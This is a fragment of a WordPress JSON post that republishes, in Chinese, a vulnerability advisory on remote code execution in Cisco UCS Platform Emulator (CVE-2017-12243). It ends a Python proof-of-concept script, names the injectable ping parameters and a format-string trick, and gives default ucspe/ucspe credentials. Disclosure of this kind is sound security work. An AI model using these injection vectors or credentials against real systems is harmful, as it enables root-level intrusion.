class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">readlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0139 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3525\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 14 Nov 2017 12:27:06 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u56683.1(2ePE1)\u4e2d\u53d1\u73b0\u7684\u4e24\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002 \u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u662f\u6346\u7ed1\u5230\u865a\u62df\u673a(VM)\u4e2d\u7684Cisco UCS Manager\u5e94\u7528\u7a0b\u5e8f\uff0cVM\u5305\u542b\u6a21\u62df\u601d\u79d1\u7edf\u4e00\u8ba1\u7b97\u7cfb\u7edf\uff08Cisco UCS\uff09\u786c\u4ef6\u901a\u4fe1\u7684\u8f6f\u4ef6\uff0c\u601d\u79d1\u7edf\u4e00\u8ba1\u7b97\u7cfb\u7edf\uff08Cisco UCS\uff09\u786c\u4ef6\u7531\u601d\u79d1UCS Manager\u914d\u7f6e\u548c\u7ba1\u7406\u3002 \u4f8b\u5982\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u6765\u521b\u5efa\u548c\u6d4b\u8bd5\u652f\u6301\u7684\u601d\u79d1UCS\u914d\u7f6e\uff0c\u6216\u8005\u590d\u5236\u73b0\u6709\u7684\u601d\u79d1UCS\u73af\u5883\uff0c\u4ee5\u8fdb\u884c\u6545\u969c\u6392\u9664\u6216\u5f00\u53d1\u3002 \u5728\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u4e2d\u53d1\u73b0\u7684\u6f0f\u6d1e\u662f\uff1a \u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e \u7ecf\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e \u4e00\u540d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u8005\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002 \u5382\u5546\u54cd\u5e94 \u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\uff0c\u5e76\u53d1\u5e03\u4ee5\u4e0bCVE\uff1a CVE-2017-12243 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e \u7531\u4e8e\u7528\u6237\u7684\u8f93\u5165\u5728\u4f20\u9012\u7ed9IP\/settings\/ping\u51fd\u6570\u65f6\u6ca1\u6709\u8fdb\u884c\u5145\u5206\u7684\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7ping_NUM\u548cping_IP_ADDR\u53c2\u6570\u6ce8\u5165\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u4ee5root\u8eab\u4efd\u6267\u884c\u3002 \u6f0f\u6d1e\u8bc1\u660e [crayon-5a0b6be0a3646409145393\/] \u901a\u8fc7\u53d1\u9001\u4ee5\u4e0a\u8bf7\u6c42\u4e4b\u4e00\u540e\uff0c\u601d\u79d1 UCS\u54cd\u5e94\u5982\u4e0b\uff1a [crayon-5a0b6be0a364d408882306\/] \u7ecf\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e \u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u5bb9\u6613\u53d7\u5230\u683c\u5f0f\u5b57\u7b26\u4e32\u6f0f\u6d1e\u7684\u653b\u51fb\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002 \u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u9ed8\u8ba4\u8fd0\u884c\u4e00\u4e2aSSH\u670d\u52a1\u5668\uff0c\u901a\u8fc7ssh\u767b\u5f55\u7684\u7528\u6237\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1a [crayon-5a0b6be0a3651407130446\/] \u5f97\u5230\u4e0b\u9762\u7684\u54cd\u5e94\uff1a [crayon-5a0b6be0a3653646969713\/] \u53ef\u4ee5\u770b\u5230\uff0c\u901a\u8fc7\u6267\u884cssh\u201cshow sel %x\u201d\u547d\u4ee4\uff0c\u6211\u4eec\u7528libsamvsh.so\u4e2d\u7684system\u51fd\u6570\u8986\u5199\u4e86_ZN7clidcos15CommandEmulator16cli_param_filterEPKc\u51fd\u6570\u7684\u5165\u53e3\u3002 \u6f0f\u6d1e\u8bc1\u660e \u4e3a\u4e86\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u8bf7\u6309\u7167\u4ee5\u4e0b\u8bf4\u660e\u64cd\u4f5c\uff1a \u4f7f\u7528\u4ee5\u4e0b\u7528\u6237\u540d\u548c\u5bc6\u7801\u5728vm\u4e0a\u5b89\u88c5ucspe\uff08\u5b89\u88c5\u5168\u90e83\u4e2a\u7f51\u5361\uff09\uff1a \u9ed8\u8ba4\u7684ucspe\u7528\u6237\uff1aucspe \u9ed8\u8ba4\u7684ucspe\u5bc6\u7801\uff1aucspe \u8fd0\u884cucspe\u5e76\u8bb0\u4e0bucspe\u7684ip\u5730\u5740\uff08\u5728\u63a7\u5236\u53f0\u53ef\u4ee5\u770b\u5230\u201cConnected to IP: \u2026.\u201d\uff09 \u5728\u8fd9\u6b21\u6f0f\u6d1e\u8bc1\u660e\u4e2d\uff0c\u6211\u4eec\u5c06\u4f1a\u4f7f\u7528ip-192.168.1.43\u3002 \u5728\u53e6\u4e00\u53f0\u673a\u5668\u4e0a\u6253\u5f00\u4e24\u4e2a\u7ec8\u7aef\uff08\u4f8b\u5982Kali\uff09 \u9996\u5148\uff0c\u5728\u7b2c\u4e00\u4e2a\u7ec8\u7aef\u4e0a\u6267\u884c\u5982\u4e0b\u64cd\u4f5c\uff1a \u521b\u5efapoc\u76ee\u5f55\uff0c\u5c06poc4_ucspe_3.1.2e.py\u653e\u5165poc\u76ee\u5f55\uff0c\u7136\u540e\u5c06\u5f53\u524d\u76ee\u5f55\u6539\u4e3apoc\u76ee\u5f55 \u521b\u5efafifo1\uff1a [crayon-5a0b6be0a3656341006860\/] \u521b\u5efa\u8f93\u51fa\u76ee\u5f55\uff1a [crayon-5a0b6be0a3658354860561\/] &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3525\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD\u5b89\u5168\u516c\u544a-\u601d\u79d1UCS\u5e73\u53f0\u6a21\u62df\u5668\u8fdc\u7a0b\u4ee3<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11682,11851,10757,12136],"class_list":["post-10484","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-remote-code-execution","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10484"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10484\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10484"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}